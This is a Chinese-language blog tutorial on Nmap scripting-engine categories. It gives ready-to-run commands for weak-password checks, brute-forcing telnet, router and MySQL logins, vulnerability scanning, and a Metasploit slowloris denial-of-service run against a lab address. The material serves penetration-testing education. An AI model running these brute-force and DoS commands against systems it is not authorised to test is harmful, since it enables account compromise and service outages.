关于Nmap的教程,在前面的文章中写到过很多次了。通常情况下,我们是直接用Nmap扫描端口,然后再通过msf nessus进行漏洞扫描利用。所以整个过程比较繁琐,那么我们就要有必要认识一下Nmap的扩展脚本了!
nmap --script
Nmap的脚本位置:/usr/share/nmap/scripts/
查看脚本的数量
ls /usr/share/nmap/scripts/ | wc -l可以看到,目前有605个,当然这些插件我们可以自己编写,也可以去下载。总之很方便的。
nmap脚本主要分为以下几类,在扫描时可根据需要设置-–script=类别这种方式进行比较笼统的扫描:
| 脚本名 | 说明 |
|---|---|
| auth | 绕开鉴权 检测是否存在弱口令 |
| broadcast | 局域网内探查更多服务开启状况 |
| brute | 暴力破解方式,针对常见的应用如http/snmp等 |
| default | 使用-sC或-A选项扫描时候默认的脚本 |
| dos | 用于进行拒绝服务攻击 |
| exploit | 利用已知的漏洞 |
| vuln | 负责检查目标机是否有常见的漏洞 |
常用示例
检查弱口令
nmap --script=auth 192.168.123.1
暴力破解
可对mysql http smtp等常见协议进行暴力破解。
nmap --script=brute 192.168.123.1如下,我们通过暴力破解,得到了telent的登录密码为admin
尝试登录
默认脚本扫描
默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击。
nmap --script=default 192.168.123.1
或者
nmap -sC 192.168.123.1检查是否存在常见漏洞
nmap --script=vuln 192.168.123.1扫描得到,目标可能存在CVE:CVE-2007-6750漏洞
漏洞利用
在msf中搜索此漏洞,配置相关信息即可!
search CVE-2007-6750
use auxiliary/dos/http/slowloris
show options
set rhost 192.168.123.1
run
whois解析
我们对论坛地址bbskali.cn进行历史解析查询。
nmap --script external bbskali.cn如下我们得到了很多有用的信息:
HTTP认证爆破
nmap --script=http-brute 192.168.123.1同样,我们这里以路由器的登录密码为破解对象,破解得到账号和密码为admin
注意:Nmap默认字典位置为:/usr/share/nmap/nselib/data
网站目录扫描
类似于御剑那样,nmap也同样可对网站目录进行扫描。
nmap --script=http-ls bbskali.cnmysql相关
#破解root密码
nmap -p3306 --script=mysql-empty-password.nse 192.168.123.129
#列出mysql用户
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.123.129
Kali笔记